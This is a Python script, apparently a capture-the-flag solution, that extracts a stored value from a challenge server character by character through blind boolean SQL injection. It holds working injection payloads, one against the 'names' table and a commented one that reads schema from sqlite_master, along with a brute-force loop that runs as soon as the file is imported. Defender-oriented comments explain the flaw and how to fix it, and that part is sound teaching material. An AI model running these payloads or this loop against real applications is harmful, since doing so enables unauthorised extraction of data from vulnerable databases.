import requests, string
# Target: the CTF challenge instance this script was written against.
# NOTE(review): the scheme is plain http://, so every request body and
# response crosses the network unencrypted.
url = "http://litctf.live:31770/"

# One shared Session so every probe reuses the same connection pool and cookies.
s = requests.Session()

# Characters recovered so far; solve() appends to this module-level string.
passwordRetrieve = ""
# ' or (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('some_char')--
# find column from table: ' or (SELECT hex(substr(sql,{index},1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('{char}')--
# Candidate characters tried at each position, in this exact order:
# uppercase, lowercase, digits, ASCII punctuation without the double quote,
# then ASCII whitespace.
alpha = (
    string.ascii_uppercase
    + string.ascii_lowercase
    + string.digits
    + string.punctuation.replace('"', "")
    + string.whitespace
)
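def solve():
    """Recover the ``name`` value from the ``names`` table one character at a time.

    Each request posts a ``name`` form field that closes the server's string
    literal and appends a boolean sub-query comparing
    ``hex(substr(name, index, 1))`` with ``hex(candidate)``. A response
    containing "You got it" is treated as the true branch.

    What this demonstrates for a defender: the script only works if the
    server builds its SQL by concatenating the submitted field into the
    query text (inferred; the server code is not shown here). Binding the
    value as a query parameter removes the oracle. The traffic is also easy
    to spot: up to ``len(alpha)`` POSTs per recovered character, each
    carrying ``substr(`` and ``hex(`` in the form body.

    Side effects: appends to the module-level ``passwordRetrieve`` and prints
    progress to stdout. Returns ``None``.

    Raises:
        requests.exceptions.RequestException: on connection failure or when
            a request exceeds the timeout.
    """
    global passwordRetrieve
    index = 1  # substr() positions are 1-based in SQLite
    # Hard-coded: 13 positions are probed. Presumably the value's length was
    # known from the challenge; confirm before reusing elsewhere.
    len_of_password = 14 - index
    for i in range(len_of_password):
        for char in alpha:
            passwordfield = f"' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"
            postParam = {'name': passwordfield}
            # Bounded wait: without a timeout a stalled server blocks the
            # script indefinitely.
            response = s.post(url, data=postParam, timeout=10).text
            if "You got it" in response:
                passwordRetrieve += char
                index += 1
                # NOTE: "len:" prints the zero-based loop counter, not the
                # length of the recovered string.
                print("Nai here yr pass: ",passwordRetrieve, " len:",i)
                break
            # NOTE(review): the source page lost its indentation; this
            # progress print is assumed to sit inside the candidate loop.
            print(char)
        else:
            # No candidate matched this position. index was not advanced, so
            # continuing would resend the whole alphabet for the same
            # position on every remaining iteration; stop instead.
            break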
# Runs the extraction as soon as the module is executed or imported; there is
# no __main__ guard, so importing this file sends network traffic.
solve()